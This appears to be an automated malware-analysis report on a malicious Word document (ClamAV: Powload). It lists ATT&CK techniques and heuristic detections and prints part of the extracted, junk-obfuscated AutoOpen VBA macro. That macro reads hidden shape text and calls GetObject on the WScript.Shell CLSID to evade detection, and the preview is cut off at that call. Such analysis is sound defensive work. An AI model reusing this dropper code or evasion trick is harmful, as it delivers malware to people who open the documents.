Verdict: MALICIOUS
Risk Score: 282
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. This macro utilizes the dangerous `GetObject` function with the `WScript.Shell` CLSID, indicating an intent to execute arbitrary code. The macro's structure suggests it is designed to download and execute a second-stage payload, a common technique for malware delivery.
Heuristics (8)
- ClamAV: Doc.Malware.Powload-6813874-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Powload-6813874-0
- VBA macros detected (medium, OLE_VBA_MACROS, 4 related findings): Document contains VBA macro code
- VBA instantiates a dangerous COM class by CLSID (critical, OLE_VBA_GETOBJECT_CLSID_DANGEROUS): VBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on.
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7353 bytes |

SHA-256 (macros.bas): a608e9357e368a852156da2e494f22d8e6b8ec6ccf39fca08a34dcf06b33c962
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "GARczMqm"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
Select Case vkrIvo
Case 261796299
JMPfnbvWX = CBool(PIMdwq)
XozAFqzj = 202977267
Case 254520823
BwZTiSn = Atn(aJpVSAf)
oDwSlB = Atn(150279987 * CLng(161171088))
End Select
For Each opEWS In IoUUarvat
WPbhSjzZf = ffUpA * CDate(BTtciGH * jjwjES) * dFcPluqhH / Sin(iqKQdUiU) / qbjQH + 108102333 - 51234510 + Chr(94127773) + (liTVM * CasZOi)
Next
On Error Resume Next
Select Case wbSfAuHqB
Case 228511584
MWQBzzj = CBool(iplArb)
EBzJRFzYj = 140090619
Case 317061610
CORXFoUc = Atn(HjQGqziK)
bbEJpG = Atn(281881762 * CLng(290387237))
End Select
For Each QMzhjD In iwQRfL
wIzRiDb = VOVuU * CDate(sZLjNXEQ * ZDNvMAOs) * PFFBsoIo / Sin(IrjLlidl) / EkSnRhX + 152978737 - 94832442 + Chr(135138031) + (PHGVn * PcqjWYY)
Next
Set mnDPzzDM = Shapes("CwhpKNbbRl")
On Error Resume Next
Select Case BXfUnH
Case 57851
RzRMWR = CBool(ZJPFj)
tTPSvJ = 198933616
Case 105961790
VBHWTPR = Atn(KzNSa)
UJVBwsLR = Atn(85127322 * CLng(240300735))
End Select
For Each IDPCrwVCw In PFAzrHz
HVBSk = IaHhXJEpW * CDate(LMCHSzr * iGFEUD) * kLNFO / Sin(pSUtRqoin) / aiVmfFr + 246706414 - 53337129 + Chr(201585195) + (odpEFEcn * rjIpVtiOB)
Next
On Error Resume Next
Select Case kCjBkNGiv
Case 179842107
KQzTP = CBool(WINstzHPE)
UXMzjLK = 106854421
Case 50139025
voBBioWD = Atn(HcQiaTF)
BrFcm = Atn(208979615 * CLng(235211728))
End Select
For Each LjbWwGhM In whGLJFaD
zBDolfaH = ZCEJJ * CDate(QXFuhd * vEAcm) * srlfYwiih / Sin(wvvqzIK) / oYovmzf + 150600169 - 62911840 + Chr(313256652) + (zoItb * QnWjKa)
Next
wKlRJ = "" + bzjFBo + rifVzRZ + LmLrpjqa + mWdkzb + mnDPzzDM.TextFrame.TextRange.Text + YjUEDZp + vJiGmDId + uBBpuTAn
On Error Resume Next
Select Case Mzupinujk
Case 58059155
XJHHcGwhs = CBool(YWNnXzi)
vvSVp = 327101863
Case 331789580
PXXUt = Atn(EqNtLoc)
KjBXnajCG = Atn(262793553 * CLng(106085712))
End Select
For Each pMcBUJI In qZJYbBS
Ziophvl = URJXWMQj * CDate(UhrNL * BfCIkZc) * mIIcczart / Sin(sjCAlDd) / aUHUa + 64122061 - 90789514 + Chr(29569258) + (KimAKrVX * Njnjdc)
Next
On Error Resume Next
Select Case FoowV
Case 157925559
JAARS = CBool(tiZtQn)
jWkiKG = 12526672
Case 298256573
IjwQi = Atn(LwbTr)
GKiCRJp = Atn(196775958 * CLng(107896437))
End Select
For Each UEFXiEFlO In HErQVBi
WbRwvnaM = jtwMP * CDate(RPrLLbHs * EVWCSShPf) * HoZXJ / Sin(wVBYsS) / rPaAd + 282037331 - 128943292 + Chr(50025956) + (ibsZRY * kzdRGIzrr)
Next
On Error Resume Next
Select Case OUPWOQjo
Case 251591343
pYXKlFHSK = CBool(XKjqbzhz)
WFAWp = 175999019
Case 164045125
UcOzV = Atn(ssMtU)
UDRWUJE = Atn(266638292 * CLng(161282208))
End Select
For Each OihmPkoCh In MznpvlBH
zOFNdhSo = CjWkiZN * CDate(SjnIEKMk * WQbaj) * zAajJ / Sin(EEwwJz) / NcPNc + 105572309 - 123600096 + Chr(121896687) + (ftDtdT * BMDSYY)
Next
On Error Resume Next
Select Case NsCjvOaRo
Case 131495540
lwcodjh = CBool(zkbFMAAB)
jikwnwVN = 201509120
Case 288855890
djCjkaCjr = Atn(PwZwF)
lmqivN = Atn(284979970 * CLng(226420251))
End Select
For Each jfzAG In zroLShr
lwUKZUk = Bihkao * CDate(zQpTd * uFfki) * Gklmju / Sin(EkaCRO) / YiOSWAK + 229956099 - 282008199 + Chr(306754750) + (ONTrsoa * EdaPwBpIk)
Next
Set CrwAvwW = GetObject("new:72C24DD5-D70A-438B-8A42-98424B8
```

... (truncated)